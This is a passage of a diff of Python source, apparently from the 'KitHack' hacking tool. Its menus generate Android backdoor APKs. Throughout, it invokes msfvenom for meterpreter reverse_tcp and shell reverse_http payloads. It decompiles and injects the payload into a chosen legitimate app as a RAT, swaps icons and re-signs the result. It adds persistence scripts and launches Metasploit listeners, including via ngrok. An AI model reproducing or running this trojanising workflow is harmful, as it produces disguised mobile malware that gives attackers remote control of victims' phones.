+ 'systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"') + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + print( + "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif m == '02': + run_network() + LHOST = input( + "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input( + "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + Tk().withdraw() + APK = filedialog.askopenfilename( + title="KITHACK - SELECT APK ORIGINAL", filetypes=(("apk files", "*.apk"), ("all files", "*.*"))) + print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + print( + "\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p android/meterpreter_reverse_tcp LPORT={0} LHOST={1} R > output/payload.apk'.format(LPORT, LHOST)) + location = os.getcwd() + print( + "{0}[*] Decompiling original APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk'.format(APK, location)) + print( + "\n{0}[*] Decompiling payload APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'apktool d -f -o output/payload output/payload.apk') + print( + "\n{0}[*] Configuring RAT Payload...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + subprocess.Popen(['bash', '-c', '. lib/apkf.sh; rat']) + print( + "\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'apktool b output/original -o output/kithack.apk') + if os.path.isfile('output/kithack.apk'): + print( + "\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') + time.sleep(4) + os.system( + 'zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + '.apk' + subprocess.Popen( + ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + print( + "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + break + print( + "\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_tcp; exploit\'"') + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + print( + "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + os.system( + 'rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + else: + print("{}\n[X] INVALID OPTION\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('clear') + main() + + else: + print("\n{}[X] INVALID OPTION\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('clear') + main() + + elif pay == '04': + print('{0}\n [*] {1}Select APK Type:\n'.format(DEFAULT, GREEN)) + print('{0}[01]{1} APK MSF'.format(WHITE, YELLOW)) + print('{0}[02]{1} APK ORIGINAL'.format(WHITE, YELLOW)) + + a = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + a = a.zfill(2) + + if a == '01': + run_network() + LHOST = input( + "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input( + "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + while input("\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + break + else: + Tk().withdraw() + icon = filedialog.askopenfilename( + title="KITHACK - SELECT ICON PNG", filetypes=(("png files", "*.png"), ("all files", "*.*"))) + print("\n{0}ICON: {1}".format(YELLOW, icon)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + file = open("/tmp/data.txt", "w") + file.write(icon + '\n') + file.write(mainout) + file.close() + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p android/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > output/payload.apk'.format(LHOST, LPORT)) + print( + "{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'apktool d -f -o output/payload output/payload.apk') + print( + "\n{0}[*] Configuring icon change...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + subprocess.Popen(['bash', '-c', '. lib/apkf.sh; icon']) + print( + "\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'apktool b output/payload -o output/kithack.apk') + location = os.getcwd() + if os.path.isfile('output/kithack.apk'): + print( + "\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') + time.sleep(4) + os.system( + 'zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + '.apk' + subprocess.Popen( + ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + print( + "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + break + print( + "\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'rm -rf output/payload output/payload.apk output/kithack.apk') + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"') + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + print( + "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + os.system( + 'rm -rf output/payload output/payload.apk output/kithack.apk') + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + # Salida de bucle + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p android/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > output/{2}.apk'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.apk'.format(mainout)).st_size != 0: + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + '.apk' + subprocess.Popen( + ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + print( + "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + break + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"') + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif a == '02': + print( + '{0}\n [*] {1}Select Method:\n'.format(DEFAULT, GREEN)) + print('{0}[01]{1} Use the old Metasploit method'.format( + WHITE, YELLOW)) + print('{0}[02]{1} Use the new KitHack method'.format( + WHITE, YELLOW)) + + m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + m = m.zfill(2) + + if m == '01': + run_network() + LHOST = input( + "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input( + "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + Tk().withdraw() + APK = filedialog.askopenfilename( + title="KITHACK - SELECT APK ORIGINAL", filetypes=(("apk files", "*.apk"), ("all files", "*.*"))) + print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -x {0} -p android/meterpreter/reverse_tcp LHOST={1} LPORT={2} > output/{3}.apk'.format(APK, LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.apk'.format(mainout)).st_size != 0: + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + '.apk' + subprocess.Popen( + ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + print( + "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + break + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"') + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + print( + "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif m == '02': + run_network() + LHOST = input( + "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input( + "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + Tk().withdraw() + APK = filedialog.askopenfilename( + title="KITHACK - SELECT APK ORIGINAL", filetypes=(("apk files", "*.apk"), ("all files", "*.*"))) + print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + print( + "\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p android/meterpreter/reverse_tcp LPORT={0} LHOST={1} R > output/payload.apk'.format(LPORT, LHOST)) + location = os.getcwd() + print( + "{0}[*] Decompiling original APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk'.format(APK, location)) + print( + "\n{0}[*] Decompiling payload APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'apktool d -f -o output/payload output/payload.apk') + print( + "\n{0}[*] Configuring RAT Payload...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + subprocess.Popen(['bash', '-c', '. lib/apkf.sh; rat']) + print( + "\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'apktool b output/original -o output/kithack.apk') + if os.path.isfile('output/kithack.apk'): + print( + "\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') + time.sleep(4) + os.system( + 'zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + '.apk' + subprocess.Popen( + ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + print( + "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + break + print( + "\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter/reverse_tcp; exploit\'"') + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + print( + "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + os.system( + 'rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + else: + print("{}\n[X] INVALID OPTION\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('clear') + main() + + else: + print("\n{}[X] INVALID OPTION\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('clear') + main() + + elif pay == '05': + print('{0}\n [*] {1}Select APK Type:\n'.format(DEFAULT, GREEN)) + print('{0}[01]{1} APK MSF'.format(WHITE, YELLOW)) + print('{0}[02]{1} APK ORIGINAL'.format(WHITE, YELLOW)) + + a = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + a = a.zfill(2) + + if a == '01': + run_network() + LHOST = input( + "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input( + "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + while input("\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + break + else: + Tk().withdraw() + icon = filedialog.askopenfilename( + title="KITHACK - SELECT ICON PNG", filetypes=(("png files", "*.png"), ("all files", "*.*"))) + print("\n{0}ICON: {1}".format(YELLOW, icon)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + file = open("/tmp/data.txt", "w") + file.write(icon + '\n') + file.write(mainout) + file.close() + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p android/shell/reverse_http LHOST={0} LPORT={1} R > output/payload.apk'.format(LHOST, LPORT)) + print( + "{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'apktool d -f -o output/payload output/payload.apk') + print( + "\n{0}[*] Configuring icon change...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + subprocess.Popen(['bash', '-c', '. lib/apkf.sh; icon']) + print( + "\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'apktool b output/payload -o output/kithack.apk') + location = os.getcwd() + if os.path.isfile('output/kithack.apk'): + print( + "\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') + time.sleep(4) + os.system( + 'zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + '.apk' + subprocess.Popen( + ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + print( + "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + break + print( + "\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'rm -rf output/payload output/payload.apk output/kithack.apk') + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_http; exploit\'"'.format(LHOST, LPORT)) + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_http; exploit\'"') + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + print( + "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + os.system( + 'rm -rf output/payload output/payload.apk output/kithack.apk') + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + # Salida de bucle + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p android/shell/reverse_http LHOST={0} LPORT={1} R > output/{2}.apk'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.apk'.format(mainout)).st_size != 0: + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + '.apk' + subprocess.Popen( + ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + print( + "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + break + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_http; exploit\'"'.format(LHOST, LPORT)) + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_http; exploit\'"') + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif a == '02': + print( + '{0}\n [*] {1}Select Method:\n'.format(DEFAULT, GREEN)) + print('{0}[01]{1} Use the old Metasploit method'.format( + WHITE, YELLOW)) + print('{0}[02]{1} Use the new KitHack method'.format( + WHITE, YELLOW)) + + m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + m = m.zfill(2) + + if m == '01': + run_network() + LHOST = input( + "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input( + "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + Tk().withdraw() + APK = filedialog.askopenfilename( + title="KITHACK - SELECT APK ORIGINAL", filetypes=(("apk files", "*.apk"), ("all files", "*.*"))) + print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -x {0} -p android/shell/reverse_http LHOST={1} LPORT={2} > output/{3}.apk'.format(APK, LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.apk'.format(mainout)).st_size != 0: + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + '.apk' + subprocess.Popen( + ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + print( + "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + break + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_http; exploit\'"'.format(LHOST, LPORT)) + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_http; exploit\'"') + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + print( + "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif m == '02': + run_network() + LHOST = input( + "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input( + "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + Tk().withdraw() + APK = filedialog.askopenfilename( + title="KITHACK - SELECT APK ORIGINAL", filetypes=(("apk files", "*.apk"), ("all files", "*.*"))) + print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + print( + "\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p android/shell/reverse_http LPORT={0} LHOST={1} R > output/payload.apk'.format(LPORT, LHOST)) + location = os.getcwd() + print( + "{0}[*] Decompiling original APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk'.format(APK, location)) + print( + "\n{0}[*] Decompiling payload APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'apktool d -f -o output/payload output/payload.apk') + print( + "\n{0}[*] Configuring RAT Payload...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + subprocess.Popen(['bash', '-c', '. lib/apkf.sh; rat']) + print( + "\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'apktool b output/original -o output/kithack.apk') + if os.path.isfile('output/kithack.apk'): + print( + "\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') + time.sleep(4) + os.system( + 'zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + '.apk' + subprocess.Popen( + ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + print( + "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + break + print( + "\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) + if 